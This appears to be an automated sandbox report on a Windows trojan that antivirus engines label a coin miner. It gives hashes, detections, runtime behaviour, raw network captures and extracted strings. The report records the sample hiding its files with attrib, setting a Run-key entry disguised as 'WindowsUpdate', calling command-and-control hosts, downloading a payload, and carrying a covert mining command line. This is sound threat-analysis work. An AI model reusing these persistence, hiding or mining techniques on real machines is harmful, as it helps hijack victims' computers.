Analysis Date2014-11-13 22:33:24
MD569b4d82069506551329f83deecec57a0
SHA111762d29f5240b6d7869dc5339b259b69bcb49e6

Static Details:

File typePE32 executable for MS Windows (console) Intel 80386 32-bit
Section.text md5: 462018ad4378a65e795351c9d4d5ff2f sha1: 852c9f4b5b0dcf461934e9a415fbf11e5f3ef138 size: 153600
Section.rdata md5: 206833d7201ac5dcf6bc81b15750d78d sha1: 63d643050ad049de96e602f41b7c5e6ada180e89 size: 45568
Section.data md5: ced8f54e5c5edcfd6aac2134c1eb9a13 sha1: 3e83a2b5e85595ea37d91e77990727756d3d5741 size: 7168
Section.rsrc md5: 2d5eb1e7989b77f5c38c72583a0272d3 sha1: c39a70046d66c7dbb155a0d50bcddb26c01bcc7f size: 512
Section.reloc md5: da961155a6c41331c5d6d04e6aa0edef sha1: ec927d2fe2181aa7fa79ef5ddd07f6adff29d0ec size: 8704
Timestamp2014-11-04 06:51:04
Pdb pathC:\Users\MrUnzO\documents\visual studio 2013\Projects\ConsoleApplication3\Release\ConsoleApplication3.pdb
PackerMicrosoft Visual C++ ?.?
PEhashe1cae17e1b33da7294ea755fa24207d7c48cfe02
IMPhash6cca618453e8177e3292c696b489e72c
AV360 SafeGen:Variant.Graftor.149231
AVAd-AwareGen:Variant.Graftor.149231
AVAlwil (avast)Malware-gen:Win32:Malware-gen
AVArcabit (arcavir)no_virus
AVAuthentiumW32/Heuristic-KPP!Eldorado
AVAvira (antivir)TR/Agent.216576.46
AVBullGuardGen:Variant.Graftor.149231
AVCA (E-Trust Ino)no_virus
AVCAT (quickheal)no_virus
AVClamAVno_virus
AVDr. Webno_virus
AVEmsisoftGen:Variant.Graftor.149231
AVEset (nod32)Win32/CoinMiner.VO
AVFortinetW32/CoinMiner.VO!tr
AVFrisk (f-prot)no_virus
AVF-SecureGen:Variant.Graftor.149231
AVGrisoft (avg)Win32/DH{gRI2A2IP}
AVIkarusno_virus
AVK7no_virus
AVKasperskyTrojan.Win32.Generic
AVMalwareBytesno_virus
AVMcafeeNew Malware.ca
AVMicrosoft Security Essentialsno_virus
AVMicroWorld (escan)Gen:Variant.Graftor.149231
AVNormanGen:Variant.Graftor.149231
AVRisingno_virus
AVSophosno_virus
AVSymantecno_virus
AVTrend Microno_virus
AVVirusBlokAda (vba32)no_virus

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

Creates FileC:\Documents and Settings\Administrator\Application Data\Windows\winlogin.exe
Creates ProcessC:\WINDOWS\system32\cmd.exe /c attrib +h "C:\malware.exe"
Creates ProcessC:\Documents and Settings\Administrator\Application Data\Windows\winlogin.exe

Process
↳ C:\WINDOWS\system32\cmd.exe /c attrib +h "C:\Documents and Settings\Administrator\Application Data\Windows\winlogin.exe"

Creates Processattrib +h "C:\Documents and Settings\Administrator\Application Data\Windows\winlogin.exe"

Process
↳ C:\WINDOWS\system32\cmd.exe /c attrib +h "C:\Documents and Settings\Administrator\Application Data\Windows\cfg"

Creates Processattrib +h "C:\Documents and Settings\Administrator\Application Data\Windows\cfg"

Process
↳ C:\WINDOWS\system32\cmd.exe /c attrib +h "winlogin.exe"

Process
↳ C:\WINDOWS\system32\cmd.exe /c attrib +h "config.ini"

Creates Processattrib +h "config.ini"

Process
↳ C:\WINDOWS\system32\cmd.exe /c attrib +h "."

Creates Processattrib +h "."

Process
↳ C:\WINDOWS\system32\cmd.exe /c attrib +h ".."

Creates Processattrib +h ".."

Process
↳ C:\WINDOWS\system32\cmd.exe /c attrib +h "C:\malware.exe"

Creates Processattrib +h "C:\malware.exe"

Process
↳ C:\WINDOWS\system32\cmd.exe /c attrib +h "C:\Documents and Settings\Administrator\Application Data\Windows\winlogin.exe"

Creates Processattrib +h "C:\Documents and Settings\Administrator\Application Data\Windows\winlogin.exe"

Process
↳ C:\WINDOWS\system32\cmd.exe /c attrib +h "C:\Documents and Settings\Administrator\Application Data\Windows\config.ini"

Creates Processattrib +h "C:\Documents and Settings\Administrator\Application Data\Windows\config.ini"

Process
↳ C:\Documents and Settings\Administrator\Application Data\Windows\winlogin.exe

RegistryHKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\WindowsUpdate ➝
"C:\Documents and Settings\Administrator\Application Data\Windows\winlogin.exe" -autorun\\x00
RegistryHKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝
NULL
RegistryHKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass ➝
1
Creates FileC:\Documents and Settings\Administrator\Application Data\Windows\config.ini
Creates FilePIPE\lsarpc
Creates File\Device\Afd\Endpoint
Creates File\Device\Afd\AsyncConnectHlp
Creates ProcessC:\WINDOWS\system32\cmd.exe /c attrib +h "winlogin.exe"
Creates ProcessC:\WINDOWS\system32\cmd.exe /c attrib +h "C:\Documents and Settings\Administrator\Application Data\Windows\cfg"
Creates ProcessC:\WINDOWS\system32\cmd.exe /c attrib +h "."
Creates ProcessC:\WINDOWS\system32\cmd.exe /c attrib +h "C:\Documents and Settings\Administrator\Application Data\Windows\winlogin.exe"
Creates ProcessC:\WINDOWS\system32\cmd.exe /c attrib +h "config.ini"
Creates ProcessC:\WINDOWS\system32\cmd.exe /c attrib +h "C:\Documents and Settings\Administrator\Application Data\Windows\winlogin.exe"
Creates ProcessC:\WINDOWS\system32\cmd.exe /c attrib +h ".."
Creates ProcessC:\WINDOWS\system32\cmd.exe /c attrib +h "C:\Documents and Settings\Administrator\Application Data\Windows\config.ini"
Creates MutexLocal\$myprogram$
Winsock DNSh4ck3r4k3.ddns.net
Winsock DNSh4ck3r.info
Winsock DNSge.tt
Winsock URLhttp://ge.tt/api/1/files/7ZgNjE32/0/blob?download
Winsock URLhttp://h4ck3r4k3.ddns.net/x.php?ID=0&V=2
Winsock URLhttp://H4CK3R.INFO/c.php?V=2&ID=0
Winsock URLhttp://H4CK3R.INFO/x.php?ID=0&V=2

Process
↳ attrib +h "C:\Documents and Settings\Administrator\Application Data\Windows\winlogin.exe"

Process
↳ attrib +h "C:\Documents and Settings\Administrator\Application Data\Windows\cfg"

Process
↳ attrib +h "config.ini"

Process
↳ attrib +h "."

Process
↳ attrib +h ".."

Process
↳ attrib +h "C:\malware.exe"

Process
↳ attrib +h "C:\Documents and Settings\Administrator\Application Data\Windows\winlogin.exe"

Process
↳ attrib +h "C:\Documents and Settings\Administrator\Application Data\Windows\config.ini"

Network Details:

DNSh4ck3r.info
Type: A
184.168.221.26
DNSh4ck3r4k3.ddns.net
Type: A
8.23.224.90
DNSge.tt
Type: A
54.195.252.180
HTTP GEThttp://h4ck3r.info/x.php?ID=0&V=2
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GEThttp://h4ck3r4k3.ddns.net/x.php?ID=0&V=2
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GEThttp://h4ck3r.info/c.php?V=2&ID=0
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GEThttp://h4ck3r.info/x.php?ID=0&V=2
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GEThttp://h4ck3r4k3.ddns.net/x.php?ID=0&V=2
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GEThttp://ge.tt/api/1/files/7ZgNjE32/0/blob?download
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
Flows TCP192.168.1.1:1032 ➝ 184.168.221.26:80
Flows TCP192.168.1.1:1033 ➝ 8.23.224.90:80
Flows TCP192.168.1.1:1034 ➝ 184.168.221.26:80
Flows TCP192.168.1.1:1035 ➝ 184.168.221.26:80
Flows TCP192.168.1.1:1036 ➝ 8.23.224.90:80
Flows TCP192.168.1.1:1037 ➝ 54.195.252.180:80

Raw Pcap
0x00000000 (00000)   47455420 2f782e70 68703f49 443d3026   GET /x.php?ID=0&
0x00000010 (00016)   563d3220 48545450 2f312e31 0d0a4163   V=2 HTTP/1.1..Ac
0x00000020 (00032)   63657074 3a202a2f 2a0d0a41 63636570   cept: */*..Accep
0x00000030 (00048)   742d456e 636f6469 6e673a20 677a6970   t-Encoding: gzip
0x00000040 (00064)   2c206465 666c6174 650d0a55 7365722d   , deflate..User-
0x00000050 (00080)   4167656e 743a204d 6f7a696c 6c612f34   Agent: Mozilla/4
0x00000060 (00096)   2e302028 636f6d70 61746962 6c653b20   .0 (compatible; 
0x00000070 (00112)   4d534945 20362e30 3b205769 6e646f77   MSIE 6.0; Window
0x00000080 (00128)   73204e54 20352e31 3b205356 313b202e   s NT 5.1; SV1; .
0x00000090 (00144)   4e455420 434c5220 322e302e 35303732   NET CLR 2.0.5072
0x000000a0 (00160)   37290d0a 486f7374 3a206834 636b3372   7)..Host: h4ck3r
0x000000b0 (00176)   2e696e66 6f0d0a43 6f6e6e65 6374696f   .info..Connectio
0x000000c0 (00192)   6e3a204b 6565702d 416c6976 650d0a0d   n: Keep-Alive...
0x000000d0 (00208)   0a                                    .

0x00000000 (00000)   47455420 2f782e70 68703f49 443d3026   GET /x.php?ID=0&
0x00000010 (00016)   563d3220 48545450 2f312e31 0d0a4163   V=2 HTTP/1.1..Ac
0x00000020 (00032)   63657074 3a202a2f 2a0d0a41 63636570   cept: */*..Accep
0x00000030 (00048)   742d456e 636f6469 6e673a20 677a6970   t-Encoding: gzip
0x00000040 (00064)   2c206465 666c6174 650d0a55 7365722d   , deflate..User-
0x00000050 (00080)   4167656e 743a204d 6f7a696c 6c612f34   Agent: Mozilla/4
0x00000060 (00096)   2e302028 636f6d70 61746962 6c653b20   .0 (compatible; 
0x00000070 (00112)   4d534945 20362e30 3b205769 6e646f77   MSIE 6.0; Window
0x00000080 (00128)   73204e54 20352e31 3b205356 313b202e   s NT 5.1; SV1; .
0x00000090 (00144)   4e455420 434c5220 322e302e 35303732   NET CLR 2.0.5072
0x000000a0 (00160)   37290d0a 486f7374 3a206834 636b3372   7)..Host: h4ck3r
0x000000b0 (00176)   346b332e 64646e73 2e6e6574 0d0a436f   4k3.ddns.net..Co
0x000000c0 (00192)   6e6e6563 74696f6e 3a204b65 65702d41   nnection: Keep-A
0x000000d0 (00208)   6c697665 0d0a0d0a                     live....

0x00000000 (00000)   47455420 2f632e70 68703f56 3d322649   GET /c.php?V=2&I
0x00000010 (00016)   443d3020 48545450 2f312e31 0d0a4163   D=0 HTTP/1.1..Ac
0x00000020 (00032)   63657074 3a202a2f 2a0d0a41 63636570   cept: */*..Accep
0x00000030 (00048)   742d456e 636f6469 6e673a20 677a6970   t-Encoding: gzip
0x00000040 (00064)   2c206465 666c6174 650d0a55 7365722d   , deflate..User-
0x00000050 (00080)   4167656e 743a204d 6f7a696c 6c612f34   Agent: Mozilla/4
0x00000060 (00096)   2e302028 636f6d70 61746962 6c653b20   .0 (compatible; 
0x00000070 (00112)   4d534945 20362e30 3b205769 6e646f77   MSIE 6.0; Window
0x00000080 (00128)   73204e54 20352e31 3b205356 313b202e   s NT 5.1; SV1; .
0x00000090 (00144)   4e455420 434c5220 322e302e 35303732   NET CLR 2.0.5072
0x000000a0 (00160)   37290d0a 486f7374 3a206834 636b3372   7)..Host: h4ck3r
0x000000b0 (00176)   2e696e66 6f0d0a43 6f6e6e65 6374696f   .info..Connectio
0x000000c0 (00192)   6e3a204b 6565702d 416c6976 650d0a0d   n: Keep-Alive...
0x000000d0 (00208)   0a3e4e6f 7420466f 756e643c 2f68313e   .>Not Found</h1>
0x000000e0 (00224)   0a202020 203c703e 596f7572 2062726f   .    <p>Your bro
0x000000f0 (00240)   77736572 2073656e 74206120 72657175   wser sent a requ
0x00000100 (00256)   65737420 74686174 20746869 73207365   est that this se
0x00000110 (00272)   72766572 20636f75 6c64206e 6f742075   rver could not u
0x00000120 (00288)   6e646572 7374616e 642e3c2f 703e0a20   nderstand.</p>. 
0x00000130 (00304)   2020203c 703e4e6f 20737563 68206669      <p>No such fi
0x00000140 (00320)   6c65206f 72206469 72656374 6f72792e   le or directory.
0x00000150 (00336)   3c2f703e 0a20203c 6872202f 3e0a2020   </p>.  <hr />.  
0x00000160 (00352)   3c616464 72657373 3e4d6963 726f736f   <address>Microso
0x00000170 (00368)   66742d49 49532f37 2e303c2f 61646472   ft-IIS/7.0</addr
0x00000180 (00384)   6573733e 0a20203c 2f626f64 793e0a3c   ess>.  </body>.<
0x00000190 (00400)   2f68746d 6c3e0a                       /html>.

0x00000000 (00000)   47455420 2f782e70 68703f49 443d3026   GET /x.php?ID=0&
0x00000010 (00016)   563d3220 48545450 2f312e31 0d0a4163   V=2 HTTP/1.1..Ac
0x00000020 (00032)   63657074 3a202a2f 2a0d0a41 63636570   cept: */*..Accep
0x00000030 (00048)   742d456e 636f6469 6e673a20 677a6970   t-Encoding: gzip
0x00000040 (00064)   2c206465 666c6174 650d0a55 7365722d   , deflate..User-
0x00000050 (00080)   4167656e 743a204d 6f7a696c 6c612f34   Agent: Mozilla/4
0x00000060 (00096)   2e302028 636f6d70 61746962 6c653b20   .0 (compatible; 
0x00000070 (00112)   4d534945 20362e30 3b205769 6e646f77   MSIE 6.0; Window
0x00000080 (00128)   73204e54 20352e31 3b205356 313b202e   s NT 5.1; SV1; .
0x00000090 (00144)   4e455420 434c5220 322e302e 35303732   NET CLR 2.0.5072
0x000000a0 (00160)   37290d0a 486f7374 3a206834 636b3372   7)..Host: h4ck3r
0x000000b0 (00176)   2e696e66 6f0d0a43 6f6e6e65 6374696f   .info..Connectio
0x000000c0 (00192)   6e3a204b 6565702d 416c6976 650d0a0d   n: Keep-Alive...
0x000000d0 (00208)   0a697665 0d0a0d0a                     .ive....

0x00000000 (00000)   47455420 2f782e70 68703f49 443d3026   GET /x.php?ID=0&
0x00000010 (00016)   563d3220 48545450 2f312e31 0d0a4163   V=2 HTTP/1.1..Ac
0x00000020 (00032)   63657074 3a202a2f 2a0d0a41 63636570   cept: */*..Accep
0x00000030 (00048)   742d456e 636f6469 6e673a20 677a6970   t-Encoding: gzip
0x00000040 (00064)   2c206465 666c6174 650d0a55 7365722d   , deflate..User-
0x00000050 (00080)   4167656e 743a204d 6f7a696c 6c612f34   Agent: Mozilla/4
0x00000060 (00096)   2e302028 636f6d70 61746962 6c653b20   .0 (compatible; 
0x00000070 (00112)   4d534945 20362e30 3b205769 6e646f77   MSIE 6.0; Window
0x00000080 (00128)   73204e54 20352e31 3b205356 313b202e   s NT 5.1; SV1; .
0x00000090 (00144)   4e455420 434c5220 322e302e 35303732   NET CLR 2.0.5072
0x000000a0 (00160)   37290d0a 486f7374 3a206834 636b3372   7)..Host: h4ck3r
0x000000b0 (00176)   346b332e 64646e73 2e6e6574 0d0a436f   4k3.ddns.net..Co
0x000000c0 (00192)   6e6e6563 74696f6e 3a204b65 65702d41   nnection: Keep-A
0x000000d0 (00208)   6c697665 0d0a0d0a                     live....

0x00000000 (00000)   47455420 2f617069 2f312f66 696c6573   GET /api/1/files
0x00000010 (00016)   2f375a67 4e6a4533 322f302f 626c6f62   /7ZgNjE32/0/blob
0x00000020 (00032)   3f646f77 6e6c6f61 64204854 54502f31   ?download HTTP/1
0x00000030 (00048)   2e310d0a 41636365 70743a20 2a2f2a0d   .1..Accept: */*.
0x00000040 (00064)   0a416363 6570742d 456e636f 64696e67   .Accept-Encoding
0x00000050 (00080)   3a20677a 69702c20 6465666c 6174650d   : gzip, deflate.
0x00000060 (00096)   0a557365 722d4167 656e743a 204d6f7a   .User-Agent: Moz
0x00000070 (00112)   696c6c61 2f342e30 2028636f 6d706174   illa/4.0 (compat
0x00000080 (00128)   69626c65 3b204d53 49452036 2e303b20   ible; MSIE 6.0; 
0x00000090 (00144)   57696e64 6f777320 4e542035 2e313b20   Windows NT 5.1; 
0x000000a0 (00160)   5356313b 202e4e45 5420434c 5220322e   SV1; .NET CLR 2.
0x000000b0 (00176)   302e3530 37323729 0d0a486f 73743a20   0.50727)..Host: 
0x000000c0 (00192)   67652e74 740d0a43 6f6e6e65 6374696f   ge.tt..Connectio
0x000000d0 (00208)   6e3a204b 6565702d 416c6976 650d0a0d   n: Keep-Alive...
0x000000e0 (00224)   0a                                    .


Strings
.
.
.
.
..
.
.
. .
!
"
'
.
().
.
 
.  
-
-1
+-0-E-
-0
  
0
0.
- 
000
....
u
                                 
/../
/..\
\../
\..\
- abort() has been called
af-za
af-ZA
ALC_ALL
america
american
american english
american-english
April
ar-ae
ar-AE
ar-bh
ar-BH
ar-dz
ar-DZ
ar-eg
ar-EG
ar-iq
ar-IQ
ar-jo
ar-JO
ar-kw
ar-KW
ar-lb
ar-LB
ar-ly
ar-LY
ar-ma
ar-MA
ar-om
ar-OM
ar-qa
ar-QA
ar-sa
ar-SA
ar-sy
ar-SY
ar-tn
ar-TN
ar-ye
ar-YE
- Attempt to initialize the CRT more than once.
- Attempt to use MSIL code from this assembly during native code initialization
August
australian
-autorun
az-az-cyrl
az-AZ-Cyrl
az-az-latn
az-AZ-Latn
BCHN
BCHS
BCHT
BCZE
BDEA
BDEC
BDEL
BDES
be-by
be-BY
belgian
BENA
BENB
BENC
BENG
BENI
BENJ
BENL
BENS
BENT
BENU
BENZ
BESA
BESB
BESC
BESD
BESE
BESF
BESG
BESH
BESI
BESL
BESM
BESN
BESO
BESR
BESS
BESU
BESV
BESY
BESZ
BFRB
BFRC
BFRL
BFRS
bg-bg
bg-BG
BGBR
BHKG
BITS
BKOR
bn-in
bn-IN
BNLB
BNLD
BNON
BNOR
BNZL
BPRI
BPTB
BR6002
britain
bs-ba-latn
bs-BA-Latn
BSVF
BSVK
BTTO
BUSA
BZAF
BZHH
BZHI
ca-es
ca-ES
canadian
china
chinese
chinese-hongkong
chinese-simplified
chinese-singapore
chinese-traditional
CONOUT$
- CRT not initialized
cs-cz
cs-CZ
cy-gb
cy-GB
czech
da-dk
da-DK
dddd, MMMM dd, yyyy
de-at
de-AT
December
de-ch
de-CH
de-de
de-DE
de-li
de-LI
de-lu
de-LU
div-mv
div-MV
DOMAIN error
dutch-belgian
Eccs
el-gr
el-GR
emscoree.dll
en-au
en-AU
en-bz
en-BZ
en-ca
en-CA
en-cb
en-CB
en-gb
en-GB
england
english-american
english-aus
english-belize
english-can
english-caribbean
english-ire
english-jamaica
english-nz
english-south africa
english-trinidad y tobago
english-uk
english-us
english-usa
en-ie
en-IE
en-jm
en-JM
en-nz
en-NZ
en-ph
en-PH
en-tt
en-TT
en-us
en-US
en-za
en-ZA
en-zw
en-ZW
es-ar
es-AR
es-bo
es-BO
es-cl
es-CL
es-co
es-CO
es-cr
es-CR
es-do
es-DO
es-ec
es-EC
es-es
es-ES
es-gt
es-GT
es-hn
es-HN
es-mx
es-MX
es-ni
es-NI
es-pa
es-PA
es-pe
es-PE
es-pr
es-PR
es-py
es-PY
es-sv
es-SV
es-uy
es-UY
es-ve
es-VE
et-ee
et-EE
eu-es
eu-ES
fa-ir
fa-IR
February
fi-fi
fi-FI
- floating point support not loaded
fo-fo
fo-FO
fr-be
fr-BE
fr-ca
fr-CA
fr-ch
fr-CH
french-belgian
french-canadian
french-luxembourg
french-swiss
fr-fr
fr-FR
Friday
fr-lu
fr-LU
fr-mc
fr-MC
german-austrian
german-lichtenstein
german-luxembourg
german-swiss
gl-es
gl-ES
great britain
gu-in
gu-IN
         (((((                  H
he-il
he-IL
HH:mm:ss
hi-in
hi-IN
holland
hong-kong
hr-ba
hr-BA
hr-hr
hr-HR
hu-hu
hu-HU
hy-am
hy-AM
id-id
id-ID
- inconsistent onexit begin-end variables
irish-english
is-is
is-IS
italian-swiss
it-ch
it-CH
it-it
it-IT
ja-jp
ja-JP
January
jjjjj
July
June
ka-ge
ka-GE
kernel32.dll
kk-kz
kk-KZ
kn-in
kn-IN
kok-in
kok-IN
ko-kr
ko-KR
ky-kg
ky-KG
LC_COLLATE
LC_CTYPE
LC_MONETARY
LC_NUMERIC
LC_TIME
lt-lt
lt-LT
lv-lv
lv-LV
March
Microsoft Visual C++ Runtime Library
mi-nz
mi-NZ
mk-mk
mk-MK
ml-in
ml-IN
MM/dd/yy
mn-mn
mn-MN
Monday
mr-in
mr-IN
ms-bn
ms-BN
ms-my
ms-MY
mt-mt
mt-MT
nb-no
nb-NO
new-zealand
nl-be
nl-BE
nl-nl
nl-NL
nn-no
nn-NO
norwegian
norwegian-bokmal
norwegian-nynorsk
- not enough space for arguments
- not enough space for environment
- not enough space for locale information
- not enough space for lowio initialization
- not enough space for _onexit/atexit table
- not enough space for stdio initialization
- not enough space for thread data
November
ns-za
ns-ZA
(null)
October
pa-in
pa-IN
pl-pl
pl-PL
portuguese-brazilian
pr china
pr-china
Program: 
<program name unknown>
pt-br
pt-BR
pt-pt
pt-PT
puerto-rico
- pure virtual function call
quz-bo
quz-BO
quz-ec
quz-EC
quz-pe
quz-PE
R6008
R6009
R6010
R6016
R6017
R6018
R6019
R6024
R6025
R6026
R6027
R6028
R6030
R6031
R6032
R6033
R6034
ro-ro
ro-RO
runtime error 
Runtime Error!
ru-ru
ru-RU
sa-in
sa-IN
Saturday
se-fi
se-FI
se-no
se-NO
September
se-se
se-SE
SING error
sk-sk
sk-SK
slovak
sl-si
sl-SI
sma-no
sma-NO
sma-se
sma-SE
smj-no
smj-NO
smj-se
smj-SE
smn-fi
smn-FI
sms-fi
sms-FI
Software\Microsoft\Windows\CurrentVersion\Run
south africa
south-africa
south korea
south-korea
spanish-argentina
spanish-bolivia
spanish-chile
spanish-colombia
spanish-costa rica
spanish-dominican republic
spanish-ecuador
spanish-el salvador
spanish-guatemala
spanish-honduras
spanish-mexican
spanish-modern
spanish-nicaragua
spanish-panama
spanish-paraguay
spanish-peru
spanish-puerto rico
spanish-uruguay
spanish-venezuela
sq-al
sq-AL
sr-ba-cyrl
sr-BA-Cyrl
sr-ba-latn
sr-BA-Latn
sr-sp-cyrl
sr-SP-Cyrl
sr-sp-latn
sr-SP-Latn
%s%s
%s%s%s
Sunday
sv-fi
sv-FI
sv-se
sv-SE
swedish-finland
swiss
sw-ke
sw-KE
syr-sy
syr-SY
ta-in
ta-IN
te-in
te-IN
This indicates a bug in your application.
This indicates a bug in your application. It is most likely the result of calling an MSIL-compiled (/clr) function from a native constructor or from DllMain.
th-th
th-TH
Thursday
TLOSS error
tn-za
tn-ZA
trinidad & tobago
tr-tr
tr-TR
tt-ru
tt-RU
Tuesday
uk-ua
uk-UA
- unable to initialize heap
- unable to open console device
- unexpected heap error
- unexpected multithread lock error
UNICODE
united-kingdom
united-states
update.zip
ur-pk
ur-PK
USER32.DLL
UTF-16LE
UTF-8
uz-uz-cyrl
uz-UZ-Cyrl
uz-uz-latn
uz-UZ-Latn
vi-vn
vi-VN
Wednesday
WindowsUpdate
xh-za
xh-ZA
zh-chs
zh-CHS
zh-cht
zh-CHT
zh-cn
zh-CN
zh-hk
zh-HK
zh-mo
zh-MO
zh-sg
zh-SG
zh-tw
zh-TW
zu-za
zu-ZA
                          
:#:$;?;
= =(=0=
0%0*00060D0J0f0p0v0
0 000@0P0`0p0
0 0$0@0H0L0d0h0
0$0,040<0D0L0T0\0d0l0t0|0
0)0<0L0
0!010A0M0W0c0o0{0
0(010d0j0p0v0|0
0 030>0C0S0_0d0o0y0
0!030E0W0i0{0
0!090O0j0
0$0D0P0T0X0\0x0|0
0123456789abcdefABCDEF
0123456789abcdefghijklmnopqrstuvwxyz
 !"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\]^_`abcdefghijklmnopqrstuvwxyz{|}~
 !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmnopqrstuvwxyz{|}~
 !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~
0%151`1r1
0'1T1w2
; ;$;(;,;0;4;8;<;@;D;H;L;P;T;X;\;`;d;h;l;p;t;x;|;
? ?$?(?,?0?4?8?<?@?D?H?L?P?T?X?\?`?d?h?l?p?t?x?|?
<$<(<,<0<4<8<<<@<D<H<L<P<T<X<\<`<d<h<t<x<|<
?0?4?L?P?h?l?
:0:7:=:B:P:
; ;(;,;0;8;@;D;H;L;T;X;\;d;h;l;t;x;
=0=8=@=D=L=`=h=|=
< <(<0<8<@<H<P<X<`<h<p<x<
; ;(;0;8;@;H;P;X;`;h;p;x;
: :(:0:8:@:H:P:X:`:h:p:x:
<$<,<0<8<@<X<\<t<x<
0C0T0q2
<0<D<O<W<j<
<$<0<<<H<T<`<l<x<
0K1S1j1
<0|m<9
;%;*;0;o;x;
0P1g1t1
;$;0;P;\;d;|;
>0>P>p>
|$0 s9Vj
?0?<?X?t?x?
1 101@1P1`1d1t1x1
1 1$1(1,1014181
1$1,141<1D1L1T1
1$1,141<1D1L1T1\1d1l1t1|1
1#1*1E1O1}1
1-1_1j1w1
1%151F1O1
1$181T1X1x1
1 191E1V1[1y1
1,1D1T1
1&2,2>2O2
1$2B2j2
1]2n2u2}2
161A1G1Y1c1l1
161H1a1m1r1y1~1
=$=,=1=7=?=D=J=R=W=]=e=j=p=x=}=
1j1p1|1
?1?K?i?
1P3T3X3p3t3x3|3
1#QNAN
1#SNAN
1V2[2m2
1V2#3R3[3
2+202O2
2$2(2,2024282D2H2L2
2 2$2(2,2024282<2@2D2H2L2P2T2X2\2`2d2h2l2p2t2x2|2
2(2,2<2@2P2T2d2h2x2|2
2$2,242<2D2L2T2\2d2l2t2|2
2!2\2a2t2
2.262t2{2
233<3D3^3}3
2	3(3]3x3
2,3:3H3V3d3
<&<2<7<e<v<
282X2x2
2B2M2_2o2}2
2F3L3R3c3n3t3
3 3$3(3,3034383<3@3D3H3L3P3T3X3\3`3d3h3l3p3t3x3|3
3 3$3(3,343<3D3L3T3\3d3l3t3|3
3$3,343<3D3L3T3\3d3l3t3|3
3#3+383B3h3
3*353\3
3"3B3t3
3&3Q3l4
3$474l4
3"4W4g4
353<3@3D3H3L3P3T3X3
354L4a4
3=5C5H5[5
383X3d3
>3>:>A>L>Q>_>d>
?%?-?3?A?O?]?d?q?z?
:%:3:D:J:P:W:_:v:
<+<3<><U<o<
434H7P7x7
4 4@4`4
4$4,444<4D4L4T4\4d4l4t4|4
4%4@4G4L4P4T4u4
4(4H4P4\4|4
4'4J4^4
4>5D5H5L5P567
>4>8>P>T>l>p>
:/;4;9;P;
4C4k4y4%6C6\6c6k6p6t6x6
?$?,?4?<?D?L?T?\?d?l?t?|?
=4=:=E=J=Q=V=~=
;(;4;@;L;X;d;p;|;
>->4>q>z>
505K5f5p5}5
5$505<5H5T5`5l5x5
5 545<5P5X5l5t5|5
5$5,545<5D5L5T5\5d5l5t5|5
5*5Y5q5
5I7S7]7
5T8^8h8
<,=6=}?
646P6p6
6 6(60686@6H6P6X6`6h6p6x6
6"6&62666B6F6L6V6`6j6t6
6$6,646@6d6l6t6|6
6$6,646<6D6L6T6\6d6l6t6|6
6(6A6R6k6v6}6
6$7.7I7S7
;-;6;a;
>#>(>.>6>;>A>I>N>T>\>a>g>o>t>z>
6H:0;;;K;};
<6<i<o<w<
70869F9
7*73797e7{7
7 7(70787@7H7P7X7`7h7p7x7
7$7,747<7D7L7T7\7d7l7t7|7
7-787?7W7f7
7<7M7S7_7o7u7
7+828:8C8`8g8o8x8
7<8@8P8T8X8\8d8|8
7<8C8e8l8
7R7X7\7`7d7
839=9S:]:g:
859<9^9e9
859A9K9Z9e9
8 8(80888@8H8P8X8`8h8p8x8
8"8(81878A8L8
8$8,848<8D8L8T8\8d8l8t8|8
888^8r8}8
8%8,8I8
8 8@8P8X8d8
8>8E8L8S8k8z8
8,8L8l8
8&9(:6:
:$:(:8:<:D:\:l:p:
: :,:8:D:P:\:h:t:
8s<x<~<
= =8=<=T=X=p=t=
;8;W;];d;
90:8:b:q:
9 9(90989@9H9P9X9`9h9p9x9
9$9(989<9@9D9L9d9t9x9
9<9\9h9
;9<A<g<v<
9D=<>X>\>`>d>h>l>p>t>x>|>
?,?9?e?o?
9@:T:d:t:
A0Y0<3f3
abcdefghijklmnopqrstuvwxyz
ABCDEFGHIJKLMNOPQRSTUVWXYZ
address family not supported
address_family_not_supported
address in use
address_in_use
address not available
address_not_available
ADVAPI32.dll
already connected
already_connected
 -a m7mhash -o stratum+tcp://xmg.suprnova.cc:7128 -u MrUnzO.nb -p x
AreFileApisANSI
argument list too long
argument out of domain
</assembly>
<assembly xmlns='urn:schemas-microsoft-com:asm.v1' manifestVersion='1.0'>
<at-<rt"<wt
attrib +h "
.?AUctype_base@std@@
August
.?AUIBindStatusCallback@@
.?AUIUnknown@@
.?AVbad_alloc@std@@
.?AVbad_cast@std@@
.?AVbad_exception@std@@
.?AV?$basic_filebuf@DU?$char_traits@D@std@@@std@@
.?AV?$basic_ifstream@DU?$char_traits@D@std@@@std@@
.?AV?$basic_ios@DU?$char_traits@D@std@@@std@@
.?AV?$basic_istream@DU?$char_traits@D@std@@@std@@
.?AV?$basic_ofstream@DU?$char_traits@D@std@@@std@@
.?AV?$basic_ostream@DU?$char_traits@D@std@@@std@@
.?AV?$basic_streambuf@DU?$char_traits@D@std@@@std@@
.?AVcodecvt_base@std@@
.?AV?$codecvt@DDH@std@@
.?AV?$ctype@D@std@@
.?AVDownloadStatus@@
.?AVerror_category@std@@
.?AVexception@std@@
.?AV_Facet_base@std@@
.?AVfacet@locale@std@@
.?AVfailure@ios_base@std@@
